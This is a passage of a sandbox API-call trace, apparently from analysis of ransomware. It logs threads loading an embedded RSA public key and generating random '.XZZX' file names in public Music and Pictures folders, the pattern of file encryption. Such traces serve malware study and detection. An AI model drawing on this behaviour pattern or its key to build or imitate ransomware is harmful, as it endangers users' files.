MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.110] lstrcpyW (in: lpString1=0x2daf460, lpString2="DE133762273869A1CE952BAA2B594DE9.XZZX" | out: lpString1="DE133762273869A1CE952BAA2B594DE9.XZZX") returned="DE133762273869A1CE952BAA2B594DE9.XZZX" [0209.110] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\" [0209.111] SetErrorMode (uMode=0x1) returned 0x1 [0209.111] lstrcpyW (in: lpString1=0x2daf860, lpString2="DE133762273869A1CE952BAA2B594DE9.XZZX" | out: lpString1="DE133762273869A1CE952BAA2B594DE9.XZZX") returned="DE133762273869A1CE952BAA2B594DE9.XZZX" [0209.111] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xb577ad0e, Data2=0x65d0, Data3=0x41bf, Data4=([0]=0x8b, [1]=0x61, [2]=0x19, [3]=0x3d, [4]=0xe0, [5]=0xd7, [6]=0x1d, [7]=0xae))) returned 0x0 [0209.111] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\DE133762273869A1CE952BAA2B594DE9.XZZX") returned 63 [0209.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0209.111] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\A88321601A25C630B577AD0E1D00AA78.XZZX") returned 63 [0209.111] StrStrW (lpFirst="DE133762273869A1CE952BAA2B594DE9.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 833 os_tid = 0xfa0 [0209.269] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.269] lstrcpyW (in: lpString1=0x2daf460, lpString2="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX" | out: lpString1="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX") returned="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX" [0209.269] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0209.269] SetErrorMode (uMode=0x1) returned 0x1 [0209.269] lstrcpyW (in: lpString1=0x2daf860, lpString2="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX" | out: lpString1="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX") returned="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX" [0209.269] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x236212ef, Data2=0x6db3, Data3=0x4478, Data4=([0]=0x96, [1]=0x10, [2]=0x8d, [3]=0xcf, [4]=0x1d, [5]=0x7c, [6]=0x8d, [7]=0x46))) returned 0x0 [0209.269] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\1758A0BD1A6F8CE6B3A600C11E90712E.XZZX") returned 76 [0209.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0209.269] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\7FA3001D1D56F7E8236212EF2031DC30.XZZX") returned 76 [0209.269] StrStrW (lpFirst="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 834 os_tid = 0xfa4 [0209.421] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.421] lstrcpyW (in: lpString1=0x2daf460, lpString2="37DA6C30402385B0E323002B44E969F8.XZZX" | out: lpString1="37DA6C30402385B0E323002B44E969F8.XZZX") returned="37DA6C30402385B0E323002B44E969F8.XZZX" [0209.421] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0209.421] SetErrorMode (uMode=0x1) returned 0x1 [0209.421] lstrcpyW (in: lpString1=0x2daf860, lpString2="37DA6C30402385B0E323002B44E969F8.XZZX" | out: lpString1="37DA6C30402385B0E323002B44E969F8.XZZX") returned="37DA6C30402385B0E323002B44E969F8.XZZX" [0209.421] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x2e27fbc4, Data2=0x49a0, Data3=0x4bff, Data4=([0]=0x82, [1]=0x8, [2]=0xf1, [3]=0x87, [4]=0x85, [5]=0x11, [6]=0x2e, [7]=0xa0))) returned 0x0 [0209.421] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\37DA6C30402385B0E323002B44E969F8.XZZX") returned 76 [0209.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0209.421] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\3FC83E8015DB36602E27FBC418B61AA8.XZZX") returned 76 [0209.421] StrStrW (lpFirst="37DA6C30402385B0E323002B44E969F8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 835 os_tid = 0xfa8 [0209.577] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.577] lstrcpyW (in: lpString1=0x2daf460, lpString2="A308B77E2F1E65BB59ECACAE33534A03.XZZX" | out: lpString1="A308B77E2F1E65BB59ECACAE33534A03.XZZX") returned="A308B77E2F1E65BB59ECACAE33534A03.XZZX" [0209.577] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0209.577] SetErrorMode (uMode=0x1) returned 0x1 [0209.577] lstrcpyW (in: lpString1=0x2daf860, lpString2="A308B77E2F1E65BB59ECACAE33534A03.XZZX" | out: lpString1="A308B77E2F1E65BB59ECACAE33534A03.XZZX") returned="A308B77E2F1E65BB59ECACAE33534A03.XZZX" [0209.577] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xc0cb24dc, Data2=0xf5e8, Data3=0x4f30, Data4=([0]=0x98, [1]=0x1, [2]=0x3d, [3]=0x25, [4]=0x1f, [5]=0x96, [6]=0x48, [7]=0x5b))) returned 0x0 [0209.577] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\A308B77E2F1E65BB59ECACAE33534A03.XZZX") returned 76 [0209.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0209.577] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\225FF3604C10B380C0CB24DC4EEB97C8.XZZX") returned 76 [0209.577] StrStrW (lpFirst="A308B77E2F1E65BB59ECACAE33534A03.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 836 os_tid = 0xfac [0209.733] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.733] lstrcpyW (in: lpString1=0x2daf460, lpString2="B2BABB8113BECBA807B8242F17F3AFF0.XZZX" | out: lpString1="B2BABB8113BECBA807B8242F17F3AFF0.XZZX") returned="B2BABB8113BECBA807B8242F17F3AFF0.XZZX" [0209.733] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0209.733] SetErrorMode (uMode=0x1) returned 0x1 [0209.733] lstrcpyW (in: lpString1=0x2daf860, lpString2="B2BABB8113BECBA807B8242F17F3AFF0.XZZX" | out: lpString1="B2BABB8113BECBA807B8242F17F3AFF0.XZZX") returned="B2BABB8113BECBA807B8242F17F3AFF0.XZZX" [0209.733] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xd3ab792b, Data2=0x9c87, Data3=0x4c6e, Data4=([0]=0xb1, [1]=0x21, [2]=0xf7, [3]=0x82, [4]=0x1, [5]=0x31, [6]=0xc1, [7]=0x3d))) returned 0x0 [0209.733] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\B2BABB8113BECBA807B8242F17F3AFF0.XZZX") returned 76 [0209.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0209.733] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\1D4319AD2EBB5602D3AB792B31963A4A.XZZX") returned 76 [0209.733] StrStrW (lpFirst="B2BABB8113BECBA807B8242F17F3AFF0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 837 os_tid = 0xfb0 [0209.891] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.891] lstrcpyW (in: lpString1=0x2daf460, lpString2="4FE187580C1CEAECF1249FC21086CF34.XZZX" | out: lpString1="4FE187580C1CEAECF1249FC21086CF34.XZZX") returned="4FE187580C1CEAECF1249FC21086CF34.XZZX" [0209.891] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\" [0209.891] SetErrorMode (uMode=0x1) returned 0x1 [0209.891] lstrcpyW (in: lpString1=0x2daf860, lpString2="4FE187580C1CEAECF1249FC21086CF34.XZZX" | out: lpString1="4FE187580C1CEAECF1249FC21086CF34.XZZX") returned="4FE187580C1CEAECF1249FC21086CF34.XZZX" [0209.891] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xfa342b3c, Data2=0x7416, Data3=0x4285, Data4=([0]=0x92, [1]=0xcf, [2]=0x79, [3]=0xc, [4]=0x6b, [5]=0xa6, [6]=0xca, [7]=0x81))) returned 0x0 [0209.891] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\4FE187580C1CEAECF1249FC21086CF34.XZZX") returned 66 [0209.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0209.891] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\2412E7281E29FB6EFA342B3C2104DFB6.XZZX") returned 66 [0209.891] StrStrW (lpFirst="4FE187580C1CEAECF1249FC21086CF34.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 838 os_tid = 0xfb4 [0210.046] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.046] lstrcpyW (in: lpString1=0x2daf460, lpString2="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX" | out: lpString1="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX") returned="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX" [0210.046] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.046] SetErrorMode (uMode=0x1) returned 0x1 [0210.046] lstrcpyW (in: lpString1=0x2daf860, lpString2="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX" | out: lpString1="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX") returned="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX" [0210.046] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x8687bae8, Data2=0xbbbf, Data3=0x4d3c, Data4=([0]=0xa8, [1]=0x68, [2]=0x78, [3]=0x7c, [4]=0x2a, [5]=0x3a, [6]=0x3e, [7]=0xe8))) returned 0x0 [0210.046] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX") returned 82 [0210.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0210.046] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\84CBEB1838A473C48687BAE83B7F580C.XZZX") returned 82 [0210.046] StrStrW (lpFirst="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 839 os_tid = 0xfb8 [0210.201] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.201] lstrcpyW (in: lpString1=0x2daf460, lpString2="28F3174E3D47A1ACF4B1346741C785F4.XZZX" | out: lpString1="28F3174E3D47A1ACF4B1346741C785F4.XZZX") returned="28F3174E3D47A1ACF4B1346741C785F4.XZZX" [0210.201] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.201] SetErrorMode (uMode=0x1) returned 0x1 [0210.201] lstrcpyW (in: lpString1=0x2daf860, lpString2="28F3174E3D47A1ACF4B1346741C785F4.XZZX" | out: lpString1="28F3174E3D47A1ACF4B1346741C785F4.XZZX") returned="28F3174E3D47A1ACF4B1346741C785F4.XZZX" [0210.201] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x160a19c4, Data2=0x3038, Data3=0x4775, Data4=([0]=0xb7, [1]=0x1a, [2]=0x6, [3]=0xb0, [4]=0xea, [5]=0x14, [6]=0x2a, [7]=0xca))) returned 0x0 [0210.201] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\28F3174E3D47A1ACF4B1346741C785F4.XZZX") returned 82 [0210.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0210.201] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\B70A62E00D759198160A19C4105075E0.XZZX") returned 82 [0210.201] StrStrW (lpFirst="28F3174E3D47A1ACF4B1346741C785F4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 840 os_tid = 0xfbc [0210.398] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.398] lstrcpyW (in: lpString1=0x2daf460, lpString2="2980FDFD3D56218AE4F6E07941E605D2.XZZX" | out: lpString1="2980FDFD3D56218AE4F6E07941E605D2.XZZX") returned="2980FDFD3D56218AE4F6E07941E605D2.XZZX" [0210.398] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.398] SetErrorMode (uMode=0x1) returned 0x1 [0210.398] lstrcpyW (in: lpString1=0x2daf860, lpString2="2980FDFD3D56218AE4F6E07941E605D2.XZZX" | out: lpString1="2980FDFD3D56218AE4F6E07941E605D2.XZZX") returned="2980FDFD3D56218AE4F6E07941E605D2.XZZX" [0210.398] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xd8471fda, Data2=0x3aaa, Data3=0x4019, Data4=([0]=0x8a, [1]=0xc2, [2]=0xfe, [3]=0x7e, [4]=0x83, [5]=0x67, [6]=0xd8, [7]=0x91))) returned 0x0 [0210.398] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\2980FDFD3D56218AE4F6E07941E605D2.XZZX") returned 82 [0210.399] MultiByteToWideChar (in: CodePage=0x0, 